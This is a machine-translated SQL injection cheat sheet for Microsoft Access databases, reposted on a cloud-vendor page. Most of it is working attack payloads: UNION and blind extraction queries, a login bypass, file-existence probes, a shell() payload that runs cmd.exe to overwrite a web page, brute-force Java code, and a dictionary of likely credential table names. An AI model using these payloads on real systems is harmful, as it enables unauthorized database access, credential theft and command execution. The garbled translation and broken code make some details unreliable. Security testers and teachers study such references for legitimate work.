Complete access SQL Injection reference

Source: Internet
Author: User

Access SQL Injection reference

Version 0.2.1
(Last updated: 10/10/2007)
Unknown Original Author

Description SQL query and comment
Annotator Access does not have a special annotator. Therefore, "/*", "--" and "#" cannot be used. However, you can use the null character "null" (% 00) instead:

  • 'Union select 1, 1 from validtablename % 00

Syntax error message "[Microsoft] [Driver ODBC Microsoft Access]"
Multi-sentence execution Not supported.
Joint Query Access supports Union query. The from keyword after union must use an existing table name.
Affiliated Query Access supports secondary queries (for example:"Top 1"Used to return the content of the first line ):

  • 'And (select top 1 'somedata' from validtablename) % 00
Limit support Limit is not supported, but can be declared in the query"Top N"To limit the number of rows returned:

  • 'Union select top 3 attrname from validtablename % 00: This statement returns 3 rows (first.
Returns 0 rows for the query. It is useful when the script only displays the results of the first query in the returned HTML results:

  • 'And 1 = 0 Union select attrname1, attrname2 from validtablename % 00
String connection Concat () functions are not supported. You can use the "&" or "+" operation to connect two strings. urlencode must be used to encode these two operators:

  • 'Union select' Web '% 2B 'app' from validtablename % 00: Return "webapp"

  • 'Union select' Web '% 26' app' from validtablename % 00: Return "webapp"
Substring Mid () function:

  • 'Union select mid ('abcd', 1, 1) from validtablename % 00: Return ""
  • 'Union select mid ('abcd', 2, 1) from validtablename % 00: Return "B"
String Length Len () function:

  • 'Union select Len ('200') from validtablename % 00: 4 is returned.
Brute-force web path You can perform the select operation on a database that does not exist. Access will respond to an error message containing the complete path .:

  • 'Union select 1 from thisafakename. faketable % 00
Returns the ASCII value of a character. ASC () function:

  • 'Union select ASC ('A') from validtable % 00: Returns the ASCII value of 65 ('A)
Convert ASCII values to characters CHR () function:

  • 'Union select CHR (65) from validtablename % 00: 'A' is returned'
If statement You can use the IIF () function. Syntax: IIF (condition, true, false ):

  • 'Union select IIF (1 = 1, 'A', 'B') from validtablename % 00: 'A' is returned'
Time Interface There are no functions similar to benchmark () or sleep (), but you can use a large number of (high load) queries to achieve this effect.Click here for Reference.
Verify whether the file exists

Use it during injection:

  • 'Union select name from msysobjects in '\ Boot. ini' % 00: (If the file exists) an error message is returned: It informs that the database format was not recognized.

Table Name guessing Here is a simple Java SDK for querying access table names. Code I wrote it to better explain the principle of table name guessing:


static private string columnerrormessage = "... ";
static private string accesserror = "... ";

[...]

Public String brutetablename (request R) {// 0

string resp = new string ();
string [] Table = {"tab_name1", "tab_name2 ",..., "tab_namen"}; // 1

for (INT I = 0; I

resp = sendinjection (R, "'Union select 1 from" + Table [I] + "% 00 "); // 2

If (resp. contains (columnerrormessage) |! Resp. contains (accesserror) // 3
return table [I];
}

return NULL;
}< br>

Brutetablename ()The parameter is an object named "request" (see Note 0). In this exampleSendinjection ()(See note 2) Try to check the query:

    • 'Union select 1 from table [I] % 00

Table [I]Is an element in the Table Name List (see note 1 ).ArticleFind a small table name list at the end of. In Note 2,Sendinjection ()The function returns the response html code after the injection code is submitted. IfRespIncludeColumnerrormessageString (see note 3). Congratulations, you have found an existing table.ColumnerrormessageThe error message returned when the number of volumes in the Union query is different from that in the primary query. If the table does not exist, the returned information is that the table does not exist, rather than the number of volumes.

Column name guess The number of columns that require a known table name and primary query:

  • 'Union select fieldname [J], 1,1, 1 from validtablename % 00

You can modify the example above (change table to fieldname). If the table does not exist, an error message indicating that the column does not exist will be returned.

Bypass Login User name:'Or 1 = 1% 00(Or"Or 1 = 1% 00)

Password: (leave blank)

Column name Enumeration Additional Terms: This principle has been tested on JBoss (A. jsp script with Access Vulnerability), but cannot be guaranteed to be available in other environments.

In general, if the SQL injection vulnerability exists, when you add a "'" after the URL parameter, you will get some error information, such:

  • Error (...) syntax (...) query (...): "id = 0 '"

From this information, we can see that the current table has a column "ID". NormallyProgramUsers will use the same URL parameter, column name, and table name. When you know a parameter, you can use MSSQL to enumerate other table names and column names:

  • 'Group by ID % 00

Now you will get a new error message containing another new column name. You can continue to enumerate other table names like this:

  • 'Group by ID, secondattrname,... % 00

Until all table names are obtained.

Interaction with the operating system

These functions are unavailable by default.

Security Prompt You can modify the Registry to lock the use of some controversial functions (such as shell (), and so on ...):

  • \ HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ jet \ 4.0 \ engines \ sandboxmode

The default value is 2, so these functions are not available by default. Next I will introduce you to the situation where the registry value is set to 0.

Get Current Directory The number of columns that require a known table name and primary query:

  • 'Union select curdir (), 1, 1 from validtablename % 00
Execute system commands The shell () function can be used to execute system commands:

  • 'And shell('cmd.exe/C echo owned> C: \ path \ Name \ index.html') % 00

Access System Table

These system tables are not accessible by default.

Msysaccessxml Columns in the table:

  • ID
  • Lvalue
  • Objectguid
  • Objectname
  • Property
  • Value
Msysaces Columns in the table:

  • ACM
  • Finheritable
  • Objectid
  • Sid
Msysobjects Here we can get the table name:

  • Connect
  • Database
  • Datacreate
  • Dataupdate
  • Flags
  • Foreignname
  • ID
  • LV
  • Lxextra
  • Lvmodule
  • Lvprop
  • Name
  • Owner
  • Parentid
  • Rmtinfolong
  • Rmtinfoshort
  • Type

This query can be used to obtain the table name in the database:

  • 'Union select name from msysobjects where type = 1% 00
Access blind note (these steps are used to guess the content of the table)
Step 1: Guess the table name You can use the dictionary provided below to guess the table name. Inject the query statement:

  • 'And (select top 1 1 from tablenametobruteforce [I]) % 00

After the injection query statement is submitted, if the HTML returned by you is the same as the normal page, the table exists. (because"And 1"Does not affect the query ).

Step 2: Guess the column name

Use the following query when the table name is instructed:

  • 'And (select top 1 fieldnametobruteforce [J] from Table) % 00

Use the same method as step 1 to determine whether a Column exists.

Step 3: Guess the number of rows In the next step, you must know the number of rows in the table. It will be used in the following query"Tab_len"Variable:

  • 'And IIF (select count (*) from validtablename) = x, 1, 0) % 00

Here"X"Is any value greater than 0. You can use the old method to determine the exact value of "X.

Step 4: Guess the Content Length

You can use the following statement to obtain"Attrib"Content Length of the first row of the column:

    • 'And IIF (select top 1 Len (attrib) from validtablename) = x, 1, 0) % 00

You can use the following statement to guess"Attrib"The second row in the column to the secondTab_lenThe length of the row content (here the value of N is 2 andTab_len (obtained earlier)):

    • 'And IIF (select Top N Len (attrib) from validtablename where attrib <> 'value1' and attrib <> 'value2 '... (ETC )...) = KKK, 1, 0) % 00

"Kkk" Any value greater than 0.Attrib <> 'valuexxx'The reason is that we have to select a specific row to guess. the method I think of is"Top N"The row value is excluded, and the remaining row is the row being guessed. Of course, there is a premise here"Attrib"Must be a primary key. Here is an example:

A1 A2 A3
1111 2222 3333
0000 4444 Oooo
Aaaa Bbbb CCCC

You can obtain the length of all content in the first line as follows:

    • 'And IIF (select top 1 Len (A1) from Table) = KKK, 1, 0) % 00

    • 'And IIF (select top 1 Len (A2) from Table) = KKK, 1, 0) % 00

    • 'And IIF (select top 1 Len (A3) from Table) = KKK, 1, 0) % 00

Then we can obtain the length of the content of the second line (assumingA1Is the table's primary key ):

    • 'And IIF (select Top 2 Len (A1) from table where
      A1 <> '20140901') = KKK, 1, 0) % 00

    • 'And IIF (select Top 2 Len (A2) from table where
      A1 <> '20140901') = KKK, 1, 0) % 00

    • 'And IIF (select Top 2 Len (A3) from table where
      A1 <> '20140901') = KKK, 1, 0) % 00

The third line is the same:

    • 'And IIF (select top 3 Len (A1) from table where
      A1 <> '20160901' and A1 <> '20160901') = KKK, 1, 0) % 00

    • 'And IIF (select top 3 Len (A2) from table where
      A1 <> '20160901' and A1 <> '20160901') = KKK, 1, 0) % 00

    • 'And IIF (select top 3 Len (A3) from table where
      A1 <> '20160901' and A1 <> '20160901') = KKK, 1, 0) % 00

Obviously, you must obtain the content of all the previous rows (you need to put it after where) after you guess the length of the content after the first row (2nd to the tab_len row ).

Step 5: Guess the content Suppose the attacker knows the table and column name, and uses the following query:

  • 'And IIF (select Top N mid (attribxxx, XXX, 1) from validtablename where att_key <> 'value1' and att_key <> 'value2'
    ... Etc...) = char (yyy), 1, 0) % 00

"N"Is the row to be guessed,"XXX"Yes"Attribxxx"The X byte,"Att_key"Is the primary key of the table."Yyy"It is a number between 0 and 255 (it represents the ASCII code of a character). Here we should use the method mentioned above to guess the content of other rows.

Table Name/column name (dictionary)
Table Name/column name (dictionary) Here is a small table/column name sample dictionary, which may be used in the guess:

  • Account, accnt, accnt, user_id, members, usrs, usr2, accounts, admin, admins, adminlogin, auth, authenticate, authentication, account, access;

  • Customers, customer, config, Conf, CFG;

  • Hash;

  • Login, logout, loginout, log;

  • Member, memberid;

  • Password, pass_hash, pass, passwd, passw, pword, pwrd, PWD;

  • Store, store1, store2, store3, store4, setting;

  • username, name, user, user_name, user_username, uname, user_uname, usern, user_usern, UN, user_un, usrnm, region, USR, usernm, user_usernm, user_nm, user_password, userpass, user_pass, user_pword, user_passw, signature, signature, and signature;

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.